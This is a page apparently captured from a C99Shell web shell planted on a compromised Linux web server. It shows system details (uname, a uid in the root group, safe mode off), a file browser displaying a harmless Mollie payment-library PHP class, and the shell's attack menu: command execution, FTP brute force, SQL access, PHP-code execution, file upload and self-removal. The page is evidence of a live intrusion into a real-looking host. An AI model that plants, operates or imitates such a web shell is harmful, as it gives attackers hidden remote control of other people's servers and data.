!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gateway.picotech.app/public_html/vendor/mollie/mollie-api-php/src/Endpoints/   drwxr-xr-x
Free 28.7 GB of 117.98 GB (24.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     BalanceReportEndpoint.php (2 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Mollie\Api\Endpoints;

use 
Mollie\Api\Resources\Balance;
use 
Mollie\Api\Resources\BalanceReport;
use 
Mollie\Api\Resources\ResourceFactory;

class 
BalanceReportEndpoint extends EndpointAbstract
{
    protected 
$resourcePath "balances_report";

    
/**
     * @inheritDoc
     */
    
protected function getResourceObject()
    {
        return new 
BalanceReport($this->client);
    }

    
/**
     * Retrieve a balance report for the provided balance id and parameters.
     *
     * @param string $balanceId
     * @param array $parameters
     * @return \Mollie\Api\Resources\BalanceReport|\Mollie\Api\Resources\BaseResource
     * @throws \Mollie\Api\Exceptions\ApiException
     */
    
public function getForId(string $balanceId, array $parameters = [])
    {
        
$this->parentId $balanceId;

        
$result $this->client->performHttpCall(
            
self::REST_READ,
            
$this->getResourcePath() . $this->buildQueryString($parameters)
        );

        return 
ResourceFactory::createFromApiResult($result$this->getResourceObject());
    }

    
/**
     * Retrieve the primary balance.
     * This is the balance of your account’s primary currency, where all payments are settled to by default.
     *
     * @param array $parameters
     * @return \Mollie\Api\Resources\BalanceReport|\Mollie\Api\Resources\BaseResource
     * @throws \Mollie\Api\Exceptions\ApiException
     */
    
public function getForPrimary(array $parameters = [])
    {
        return 
$this->getForId("primary"$parameters);
    }


    
/**
     * Retrieve a balance report for the provided balance resource and parameters.
     *
     * @param \Mollie\Api\Resources\Balance $balance
     * @param array $parameters
     * @return \Mollie\Api\Resources\BalanceReport|\Mollie\Api\Resources\BaseResource
     * @throws \Mollie\Api\Exceptions\ApiException
     */
    
public function getFor(Balance $balance, array $parameters = [])
    {
        return 
$this->getForId($balance->id$parameters);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--